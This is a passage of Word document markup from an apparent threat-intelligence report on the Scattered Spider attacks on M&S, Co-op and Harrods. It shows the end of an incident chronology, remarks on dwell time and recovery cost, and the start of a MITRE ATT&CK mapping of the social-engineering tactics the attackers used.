              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EF02B73" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10 Jul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3EBFB48B" w14:textId="6B9D6B39" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UK authorities arrest four over attacks on M&amp;S, Co-op and Harrods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="28A17E53" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C4D990B" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Jul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17F4E27C" w14:textId="4D3A8795" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Co-op says the incident affected over 6.5 million members and exposed names, contact details and membership numbers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5240D384" w14:textId="77777777" w:rsidR="00ED2635" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc234776713"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>There are two analytically relevant elements of this chronology. The first is the interval between the anticipated initial access in February and the disruption in late April, indicating significant dwell time — the actor was in place long before the ransomware exploded. Second, the six-week recovery for M&amp;S emphasizes that the real cost was operational continuity, not the ransom decision itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D4B85" w14:textId="5FC2E10F" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.3 Adversary TTP Mapping (MITRE ATT&amp;CK® Enterprise)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7A571371" w14:textId="0EEC5939" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Below is the mapping of the campaign to the MITRE ATT&amp;CK Enterprise Matrix. There are twelve tactics identified across the attack chain, with their ATT&amp;CK identity and a brief rationale from the reports. Where a specific technique is based on Scattered Spider’s known playbook, rather being validated in this occurrence, we note this as a supposition.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1270"/>
        <w:gridCol w:w="3461"/>
        <w:gridCol w:w="4629"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="59DBEA85" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7991C5FE" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6865897F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique (ID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1A58C074" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Justification / Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7BCAFEA3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64C0DBFD" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55C4536C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Gather Victim Identity Info (T1589)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="67C14041" w14:textId="6278B591" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Scattered Spider typically starts by collecting employee IDs from LinkedIn and open sources to build a credible help-desk pretext.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="4EFC4847" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3597AB2D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="168EAFD9" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phishing / Voice Phishing (T1566 / T1566.004)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7AFCCAC8" w14:textId="43CF97B3" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reports initial access via social engineering of IT support staff – impersonating an employee via phone to acquire or reset credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="25E4AD13" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3F6D9BBE" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AFC9A98" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Trusted Relationship (T1199)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77C39980" w14:textId="47A9F5DA" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Third-party / service-desk access process abuse; the actor abused the confidence given to internal support workflows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7CE3BF7D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50D08931" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B2C0E17" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MFA Request Generation / Reset (T1621)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
